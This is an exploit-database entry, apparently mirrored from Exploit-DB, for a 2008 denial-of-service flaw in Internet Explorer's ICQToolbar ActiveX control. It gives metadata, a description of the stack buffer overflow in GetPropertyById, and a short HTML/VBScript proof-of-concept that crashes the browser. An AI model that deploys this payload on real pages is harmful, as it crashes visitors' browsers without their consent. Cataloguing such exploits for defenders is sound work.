header-logo
Suggest Exploit
vendor:
ICQToolbar
by:
milw0rm.com
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: ICQToolbar
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2008

Lame ICQToolbar IE DoS – Crash IE and change toolbar color :p

This vulnerability allows remote attackers to cause a denial of service (crash) and change the color of the ICQToolbar in Internet Explorer. The vulnerability is due to a boundary error when handling a specially crafted GetPropertyById request. This can be exploited to cause a stack-based buffer overflow via an overly long string passed to the GetPropertyById method of the ICQToolbar ActiveX control (855F3B16-6D32-4FE6-8A56-BBB695989046).

Mitigation:

Upgrade to the latest version of ICQToolbar.
Source

Exploit-DB raw data:

<!--
	Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p
-->

<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>

<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof

</script>
</html>

# milw0rm.com [2008-03-06]

Navigation

Suggest Exploit

Services By CQR